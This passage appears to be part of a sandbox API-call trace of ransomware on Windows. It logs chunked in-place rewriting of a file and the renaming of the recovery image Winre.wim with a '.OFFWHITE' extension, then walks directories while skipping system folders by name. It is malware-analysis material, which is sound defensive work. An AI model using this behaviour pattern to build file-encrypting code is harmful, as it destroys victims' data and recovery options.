dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0130.379] WriteFile (in: hFile=0x220, lpBuffer=0x5557b0*, nNumberOfBytesToWrite=0x1e848, lpNumberOfBytesWritten=0x295ebcc, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesWritten=0x295ebcc*=0x1e848, lpOverlapped=0x0) returned 1 [0130.380] GetProcessHeap () returned 0x500000 [0130.380] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5557b0 | out: hHeap=0x500000) returned 1 [0130.380] GetProcessHeap () returned 0x500000 [0130.380] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x1e848) returned 0x5557b0 [0130.380] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x9dd5460, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0130.380] ReadFile (in: hFile=0x220, lpBuffer=0x5557b0, nNumberOfBytesToRead=0x1e848, lpNumberOfBytesRead=0x295ebc0, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesRead=0x295ebc0*=0x1e848, lpOverlapped=0x0) returned 1 [0130.389] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x9dd5460, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0130.389] WriteFile (in: hFile=0x220, lpBuffer=0x5557b0*, nNumberOfBytesToWrite=0x1e848, lpNumberOfBytesWritten=0x295ebcc, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesWritten=0x295ebcc*=0x1e848, lpOverlapped=0x0) returned 1 [0130.390] GetProcessHeap () returned 0x500000 [0130.390] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5557b0 | out: hHeap=0x500000) returned 1 [0130.390] GetProcessHeap () returned 0x500000 [0130.390] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x1e848) returned 0x5557b0 [0130.390] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x9e124f0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0130.390] ReadFile (in: hFile=0x220, lpBuffer=0x5557b0, nNumberOfBytesToRead=0x1e848, lpNumberOfBytesRead=0x295ebc0, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesRead=0x295ebc0*=0x1e848, lpOverlapped=0x0) returned 1 [0130.405] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x9e124f0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0130.405] WriteFile (in: hFile=0x220, lpBuffer=0x5557b0*, nNumberOfBytesToWrite=0x1e848, lpNumberOfBytesWritten=0x295ebcc, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesWritten=0x295ebcc*=0x1e848, lpOverlapped=0x0) returned 1 [0130.406] GetProcessHeap () returned 0x500000 [0130.406] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5557b0 | out: hHeap=0x500000) returned 1 [0130.406] GetProcessHeap () returned 0x500000 [0130.406] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x1e848) returned 0x5557b0 [0130.406] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x9e4f580, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0130.406] ReadFile (in: hFile=0x220, lpBuffer=0x5557b0, nNumberOfBytesToRead=0x1e848, lpNumberOfBytesRead=0x295ebc0, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesRead=0x295ebc0*=0x1e848, lpOverlapped=0x0) returned 1 [0130.414] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x9e4f580, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0130.414] WriteFile (in: hFile=0x220, lpBuffer=0x5557b0*, nNumberOfBytesToWrite=0x1e848, lpNumberOfBytesWritten=0x295ebcc, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesWritten=0x295ebcc*=0x1e848, lpOverlapped=0x0) returned 1 [0130.415] GetProcessHeap () returned 0x500000 [0130.415] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5557b0 | out: hHeap=0x500000) returned 1 [0130.415] GetProcessHeap () returned 0x500000 [0130.415] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x1e848) returned 0x5557b0 [0130.415] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x9e8c610, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0130.415] ReadFile (in: hFile=0x220, lpBuffer=0x5557b0, nNumberOfBytesToRead=0x1e848, lpNumberOfBytesRead=0x295ebc0, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesRead=0x295ebc0*=0x1e848, lpOverlapped=0x0) returned 1 [0130.426] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x9e8c610, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0130.426] WriteFile (in: hFile=0x220, lpBuffer=0x5557b0*, nNumberOfBytesToWrite=0x1e848, lpNumberOfBytesWritten=0x295ebcc, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesWritten=0x295ebcc*=0x1e848, lpOverlapped=0x0) returned 1 [0130.427] GetProcessHeap () returned 0x500000 [0130.427] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5557b0 | out: hHeap=0x500000) returned 1 [0130.427] GetProcessHeap () returned 0x500000 [0130.427] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x1e848) returned 0x5557b0 [0130.427] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x9ec96a0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0130.427] ReadFile (in: hFile=0x220, lpBuffer=0x5557b0, nNumberOfBytesToRead=0x1e848, lpNumberOfBytesRead=0x295ebc0, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesRead=0x295ebc0*=0x1e848, lpOverlapped=0x0) returned 1 [0130.436] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x9ec96a0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0130.436] WriteFile (in: hFile=0x220, lpBuffer=0x5557b0*, nNumberOfBytesToWrite=0x1e848, lpNumberOfBytesWritten=0x295ebcc, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesWritten=0x295ebcc*=0x1e848, lpOverlapped=0x0) returned 1 [0130.436] GetProcessHeap () returned 0x500000 [0130.437] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5557b0 | out: hHeap=0x500000) returned 1 [0130.437] GetProcessHeap () returned 0x500000 [0130.437] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x1e848) returned 0x5557b0 [0130.437] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x9f06730, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0130.437] ReadFile (in: hFile=0x220, lpBuffer=0x5557b0, nNumberOfBytesToRead=0x1e848, lpNumberOfBytesRead=0x295ebc0, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesRead=0x295ebc0*=0x1e848, lpOverlapped=0x0) returned 1 [0130.455] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x9f06730, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0130.455] WriteFile (in: hFile=0x220, lpBuffer=0x5557b0*, nNumberOfBytesToWrite=0x1e848, lpNumberOfBytesWritten=0x295ebcc, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesWritten=0x295ebcc*=0x1e848, lpOverlapped=0x0) returned 1 [0130.456] GetProcessHeap () returned 0x500000 [0130.456] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5557b0 | out: hHeap=0x500000) returned 1 [0130.456] GetProcessHeap () returned 0x500000 [0130.456] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x1e848) returned 0x5557b0 [0130.456] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x9f437c0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0130.456] ReadFile (in: hFile=0x220, lpBuffer=0x5557b0, nNumberOfBytesToRead=0x1e848, lpNumberOfBytesRead=0x295ebc0, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesRead=0x295ebc0*=0x1e848, lpOverlapped=0x0) returned 1 [0130.467] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x9f437c0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0130.467] WriteFile (in: hFile=0x220, lpBuffer=0x5557b0*, nNumberOfBytesToWrite=0x1e848, lpNumberOfBytesWritten=0x295ebcc, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesWritten=0x295ebcc*=0x1e848, lpOverlapped=0x0) returned 1 [0130.468] GetProcessHeap () returned 0x500000 [0130.468] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5557b0 | out: hHeap=0x500000) returned 1 [0130.468] GetProcessHeap () returned 0x500000 [0130.468] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x1e848) returned 0x5557b0 [0130.468] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x9f80850, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0130.468] ReadFile (in: hFile=0x220, lpBuffer=0x5557b0, nNumberOfBytesToRead=0x1e848, lpNumberOfBytesRead=0x295ebc0, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesRead=0x295ebc0*=0x1e848, lpOverlapped=0x0) returned 1 [0130.477] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x9f80850, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0130.477] WriteFile (in: hFile=0x220, lpBuffer=0x5557b0*, nNumberOfBytesToWrite=0x1e848, lpNumberOfBytesWritten=0x295ebcc, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesWritten=0x295ebcc*=0x1e848, lpOverlapped=0x0) returned 1 [0130.478] GetProcessHeap () returned 0x500000 [0130.478] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5557b0 | out: hHeap=0x500000) returned 1 [0130.478] GetProcessHeap () returned 0x500000 [0130.478] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x1e848) returned 0x5557b0 [0130.478] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x9fbd8e0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0130.478] ReadFile (in: hFile=0x220, lpBuffer=0x5557b0, nNumberOfBytesToRead=0x1e848, lpNumberOfBytesRead=0x295ebc0, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesRead=0x295ebc0*=0x1e848, lpOverlapped=0x0) returned 1 [0130.487] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x9fbd8e0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0130.487] WriteFile (in: hFile=0x220, lpBuffer=0x5557b0*, nNumberOfBytesToWrite=0x1e848, lpNumberOfBytesWritten=0x295ebcc, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesWritten=0x295ebcc*=0x1e848, lpOverlapped=0x0) returned 1 [0130.488] GetProcessHeap () returned 0x500000 [0130.488] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5557b0 | out: hHeap=0x500000) returned 1 [0130.488] GetProcessHeap () returned 0x500000 [0130.488] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x1e848) returned 0x5557b0 [0130.488] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x9ffa970, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0130.488] ReadFile (in: hFile=0x220, lpBuffer=0x5557b0, nNumberOfBytesToRead=0x1e848, lpNumberOfBytesRead=0x295ebc0, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesRead=0x295ebc0*=0x1e848, lpOverlapped=0x0) returned 1 [0130.566] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x9ffa970, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0130.566] WriteFile (in: hFile=0x220, lpBuffer=0x5557b0*, nNumberOfBytesToWrite=0x1e848, lpNumberOfBytesWritten=0x295ebcc, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesWritten=0x295ebcc*=0x1e848, lpOverlapped=0x0) returned 1 [0130.567] GetProcessHeap () returned 0x500000 [0130.567] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5557b0 | out: hHeap=0x500000) returned 1 [0130.567] GetProcessHeap () returned 0x500000 [0130.567] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x1e848) returned 0x5557b0 [0130.567] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0xa037a00, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0130.568] ReadFile (in: hFile=0x220, lpBuffer=0x5557b0, nNumberOfBytesToRead=0x1e848, lpNumberOfBytesRead=0x295ebc0, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesRead=0x295ebc0*=0x1e848, lpOverlapped=0x0) returned 1 [0130.576] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0xa037a00, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0130.576] WriteFile (in: hFile=0x220, lpBuffer=0x5557b0*, nNumberOfBytesToWrite=0x1e848, lpNumberOfBytesWritten=0x295ebcc, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesWritten=0x295ebcc*=0x1e848, lpOverlapped=0x0) returned 1 [0130.576] GetProcessHeap () returned 0x500000 [0130.576] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5557b0 | out: hHeap=0x500000) returned 1 [0130.576] GetProcessHeap () returned 0x500000 [0130.576] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x1e848) returned 0x5557b0 [0130.576] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0xa074a90, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0130.576] ReadFile (in: hFile=0x220, lpBuffer=0x5557b0, nNumberOfBytesToRead=0x1e848, lpNumberOfBytesRead=0x295ebc0, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesRead=0x295ebc0*=0x1e848, lpOverlapped=0x0) returned 1 [0130.601] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0xa074a90, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0130.601] WriteFile (in: hFile=0x220, lpBuffer=0x5557b0*, nNumberOfBytesToWrite=0x1e848, lpNumberOfBytesWritten=0x295ebcc, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesWritten=0x295ebcc*=0x1e848, lpOverlapped=0x0) returned 1 [0130.602] GetProcessHeap () returned 0x500000 [0130.602] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5557b0 | out: hHeap=0x500000) returned 1 [0130.602] GetProcessHeap () returned 0x500000 [0130.602] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x1e848) returned 0x5557b0 [0130.602] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0xa0b1b20, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0130.602] ReadFile (in: hFile=0x220, lpBuffer=0x5557b0, nNumberOfBytesToRead=0x1e848, lpNumberOfBytesRead=0x295ebc0, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesRead=0x295ebc0*=0x1e848, lpOverlapped=0x0) returned 1 [0130.610] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0xa0b1b20, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0130.610] WriteFile (in: hFile=0x220, lpBuffer=0x5557b0*, nNumberOfBytesToWrite=0x1e848, lpNumberOfBytesWritten=0x295ebcc, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesWritten=0x295ebcc*=0x1e848, lpOverlapped=0x0) returned 1 [0130.610] GetProcessHeap () returned 0x500000 [0130.610] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5557b0 | out: hHeap=0x500000) returned 1 [0130.610] GetProcessHeap () returned 0x500000 [0130.610] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x1e848) returned 0x5557b0 [0130.610] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0xa0eebb0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0130.610] ReadFile (in: hFile=0x220, lpBuffer=0x5557b0, nNumberOfBytesToRead=0x1e848, lpNumberOfBytesRead=0x295ebc0, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesRead=0x295ebc0*=0x1e848, lpOverlapped=0x0) returned 1 [0130.631] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0xa0eebb0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0130.631] WriteFile (in: hFile=0x220, lpBuffer=0x5557b0*, nNumberOfBytesToWrite=0x1e848, lpNumberOfBytesWritten=0x295ebcc, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesWritten=0x295ebcc*=0x1e848, lpOverlapped=0x0) returned 1 [0130.633] GetProcessHeap () returned 0x500000 [0130.633] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5557b0 | out: hHeap=0x500000) returned 1 [0130.633] CloseHandle (hObject=0x220) returned 1 [0131.545] GetProcessHeap () returned 0x500000 [0131.545] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5243b8 | out: hHeap=0x500000) returned 1 [0131.545] GetProcessHeap () returned 0x500000 [0131.545] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5242b0 | out: hHeap=0x500000) returned 1 [0131.545] GetProcessHeap () returned 0x500000 [0131.545] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5487c0 | out: hHeap=0x500000) returned 1 [0131.545] GetProcessHeap () returned 0x500000 [0131.545] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5487a8 | out: hHeap=0x500000) returned 1 [0131.545] lstrcpyW (in: lpString1=0x295e9b8, lpString2="C:/Recovery\\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\\Winre.wim" | out: lpString1="C:/Recovery\\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\\Winre.wim") returned="C:/Recovery\\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\\Winre.wim" [0131.545] lstrcatW (in: lpString1="C:/Recovery\\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\\Winre.wim", lpString2=".OFFWHITE" | out: lpString1="C:/Recovery\\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\\Winre.wim.OFFWHITE") returned="C:/Recovery\\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\\Winre.wim.OFFWHITE" [0131.545] MoveFileW (lpExistingFileName="C:/Recovery\\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\\Winre.wim" (normalized: "c:\\recovery\\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\\winre.wim"), lpNewFileName="C:/Recovery\\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\\Winre.wim.OFFWHITE" (normalized: "c:\\recovery\\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\\winre.wim.offwhite")) returned 1 [0131.753] FindNextFileW (in: hFindFile=0x544690, lpFindFileData=0x295ec18 | out: lpFindFileData=0x295ec18*(dwFileAttributes=0x2006, ftCreationTime.dwLowDateTime=0x6496a3c6, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x64b0e1b9, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0xfa6eb761, ftLastWriteTime.dwHighDateTime=0x1cb88d1, nFileSizeHigh=0x0, nFileSizeLow=0xa160012, dwReserved0=0x20001e, dwReserved1=0x295f6f0, cFileName="Winre.wim", cAlternateFileName="")) returned 0 [0131.753] FindClose (in: hFindFile=0x544690 | out: hFindFile=0x544690) returned 1 [0131.753] FindNextFileW (in: hFindFile=0x5446d0, lpFindFileData=0x295f298 | out: lpFindFileData=0x295f298*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x27c09980, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x27c2fae0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x27c2fae0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x3896bb9e, dwReserved1=0xdd354335, cFileName="e9e23962-4a25-11e7-88e8-91fb2ec43f0b", cAlternateFileName="E9E239~1")) returned 0 [0131.754] FindClose (in: hFindFile=0x5446d0 | out: hFindFile=0x5446d0) returned 1 [0131.765] FindNextFileW (in: hFindFile=0x5445d0, lpFindFileData=0x295f918 | out: lpFindFileData=0x295f918*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0x56231c60, ftCreationTime.dwHighDateTime=0x1d2de2a, ftLastAccessTime.dwLowDateTime=0xa1602bc0, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0xa1602bc0, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="System Volume Information", cAlternateFileName="SYSTEM~1")) returned 1 [0131.765] lstrcmpiW (lpString1="System Volume Information", lpString2=".") returned 1 [0131.765] lstrcmpiW (lpString1="System Volume Information", lpString2="..") returned 1 [0131.765] lstrcmpiW (lpString1="System Volume Information", lpString2="...") returned 1 [0131.765] lstrcmpiW (lpString1="System Volume Information", lpString2="windows") returned -1 [0131.765] lstrcmpiW (lpString1="System Volume Information", lpString2="$recycle.bin") returned 1 [0131.765] lstrcmpiW (lpString1="System Volume Information", lpString2="rsa") returned 1 [0131.765] lstrcmpiW (lpString1="System Volume Information", lpString2="ntuser.dat") returned 1 [0131.765] lstrcmpiW (lpString1="System Volume Information", lpString2="programdata") returned 1 [0131.765] lstrcmpiW (lpString1="System Volume Information", lpString2="appdata") returned 1 [0131.765] lstrcmpiW (lpString1="System Volume Information", lpString2="program files") returned 1 [0131.765] lstrcmpiW (lpString1="System Volume Information", lpString2="program files (x86)") returned 1 [0131.765] lstrcpyW (in: lpString1=0x295fb68, lpString2="C:/" | out: lpString1="C:/") returned="C:/" [0131.765] lstrcatW (in: lpString1="C:/", lpString2="System Volume Information" | out: lpString1="C:/System Volume Information") returned="C:/System Volume Information" [0131.765] lstrcatW (in: lpString1="C:/System Volume Information", lpString2="\\" | out: lpString1="C:/System Volume Information\\") returned="C:/System Volume Information\\" [0131.765] lstrcpyW (in: lpString1=0x295f6f0, lpString2="C:/System Volume Information\\" | out: lpString1="C:/System Volume Information\\") returned="C:/System Volume Information\\" [0131.765] lstrcatW (in: lpString1="C:/System Volume Information\\", lpString2="*.*" | out: lpString1="C:/System Volume Information\\*.*") returned="C:/System Volume Information\\*.*" [0131.765] FindFirstFileW (in: lpFileName="C:/System Volume Information\\*.*", lpFindFileData=0x295f298 | out: lpFindFileData=0x295f298*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x27c09980, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x27c2fae0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x27c2fae0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x3896bb9e, dwReserved1=0xdd354335, cFileName="e9e23962-4a25-11e7-88e8-91fb2ec43f0b", cAlternateFileName="E9E239~1")) returned 0xffffffff [0131.766] FindNextFileW (in: hFindFile=0x5445d0, lpFindFileData=0x295f918 | out: lpFindFileData=0x295f918*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfda01e06, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x28c670c0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x28c670c0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Users", cAlternateFileName="")) returned 1 [0131.766] lstrcmpiW (lpString1="Users", lpString2=".") returned 1 [0131.766] lstrcmpiW (lpString1="Users", lpString2="..") returned 1 [0131.766] lstrcmpiW (lpString1="Users", lpString2="...") returned 1 [0131.766] lstrcmpiW (lpString1="Users", lpString2="windows") returned -1 [0131.766] lstrcmpiW (lpString1="Users", lpString2="$recycle.bin") returned 1 [0131.766] lstrcmpiW (lpString1="Users", lpString2="rsa") returned 1 [0131.766] lstrcmpiW (lpString1="Users", lpString2="ntuser.dat") returned 1 [0131.766] lstrcmpiW (lpString1="Users", lpString2="programdata") returned 1 [0131.766] lstrcmpiW (lpString1="Users", lpString2="appdata") returned 1 [0131.766] lstrcmpiW (lpString1="Users", lpString2="program files") returned 1 [0131.766] lstrcmpiW (lpString1="Users", lpString2="program files (x86)") returned 1 [0131.766] lstrcpyW (in: lpString1=0x295fb68, lpString2="C:/" | out: lpString1="C:/") returned="C:/" [0131.766] lstrcatW (in: lpString1="C:/", lpString2="Users" | out: lpString1="C:/Users") returned="C:/Users" [0131.766] lstrcatW (in: lpString1="C:/Users", lpString2="\\" | out: lpString1="C:/Users\\") returned="C:/Users\\" [0131.766] lstrcpyW (in: lpString1=0x295f6f0, lpString2="C:/Users\\" | out: lpString1="C:/Users\\") returned="C:/Users\\" [0131.766] lstrcatW (in: lpString1="C:/Users\\", lpString2="*.*" | out: lpString1="C:/Users\\*.*") returned="C:/Users\\*.*" [0131.766] FindFirstFileW (in: lpFileName="C:/Users\\*.*", lpFindFileData=0x295f298 | out: lpFindFileData=0x295f298*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfda01e06, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x28c670c0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x28c670c0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x3896bb9e, dwReserved1=0xdd354335, cFileName=".", cAlternateFileName="")) returned 0x5446d0 [0131.766] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0131.766] FindNextFileW (in: hFindFile=0x5446d0, lpFindFileData=0x295f298 | out: lpFindFileData=0x295f298*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfda01e06, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x28c670c0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x28c670c0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x3896bb9e, dwReserved1=0xdd354335, cFileName="..", cAlternateFileName="")) returned 1 [0131.766] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0131.766] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0131.767] FindNextFileW (in: hFindFile=0x5446d0, lpFindFileData=0x295f298 | out: lpFindFileData=0x295f298*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x28c670c0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x2914fe20, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2914fe20, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x3896bb9e, dwReserved1=0xdd354335, cFileName="5p5NrGJn0jS HALPmcxz", cAlternateFileName="5P5NRG~1")) returned 1 [0131.767] lstrcmpiW (lpString1="5p5NrGJn0jS HALPmcxz", lpString2=".") returned 1 [0131.767] lstrcmpiW (lpString1="5p5NrGJn0jS HALPmcxz", lpString2="..") returned 1 [0131.767] lstrcmpiW (lpString1="5p5NrGJn0jS HALPmcxz", 